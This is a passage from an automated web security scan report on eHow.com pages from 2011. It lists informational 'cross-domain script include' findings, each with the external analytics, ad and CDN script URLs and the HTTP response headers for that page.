       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.458. http://www.ehow.com/groups.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/groups.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/community-rtlcow.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22798

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Group Directory | eHow.com</title>
       <meta chars
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


   <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/community-OUab6g.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/community-rtlcow.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.459. http://www.ehow.com/healthcare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthcare/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71256

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Healthcare - How To Information | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.460. http://www.ehow.com/healthy-living/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthy-living/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71786

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Healthy Living - How To Information | eHow.com</t
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.461. http://www.ehow.com/hobbies-and-science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/hobbies-and-science/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72324

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Hobbies & Science - How To Information | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.462. http://www.ehow.com/holidays-and-celebrations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/holidays-and-celebrations/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73274

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Holidays & Celebrations - How To Information | eH
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.463. http://www.ehow.com/home-building-and-remodeling/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-building-and-remodeling/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72263

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Building & Remodeling - How To Information |
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.464. http://www.ehow.com/home-design-and-decorating/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-design-and-decorating/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72585

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Design & Decorating - How To Information | e
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.465. http://www.ehow.com/home-maintenance-and-repair/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-maintenance-and-repair/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73323

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Maintenance & Repair - How To Information |
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.466. http://www.ehow.com/home-safety-and-household-tips/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-safety-and-household-tips/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70372

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Safety & Household Tips - How To Information
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.467. http://www.ehow.com/home-security-alarm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-security-alarm/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60532

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Security Alarm - eHow.com</title>
       <meta c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/topic-v2-4LSRhA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.468. http://www.ehow.com/housekeeping/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/housekeeping/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71682

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Housekeeping - How To Information | eHow.com</tit
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.469. http://www.ehow.com/how-to.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how-to.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27417

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How To Directory | eHow.com</title>
       <meta char
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.470. http://www.ehow.com/how_13299_know-someone-lying.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_13299_know-someone-lying.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81273

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Know if Someone Is Lying | eHow.com</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_13299_know-someone-lying.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.471. http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2053743_make-crock-pot-pork-roast.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75868

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Crock Pot Pork Roast | eHow.com</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.472. http://www.ehow.com/how_2077554_repair-cracks-dashboard.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2077554_repair-cracks-dashboard.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75172

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Repair Cracks in a Dashboard | eHow.com</t
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_2077554_repair-cracks-dashboard.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.473. http://www.ehow.com/how_2113353_end-sibling-feuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2113353_end-sibling-feuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

18.474. http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2304056_cut-shirt-make-cuter.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76457

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Cut a T Shirt To Make It Cuter | eHow.com<
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html" />

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

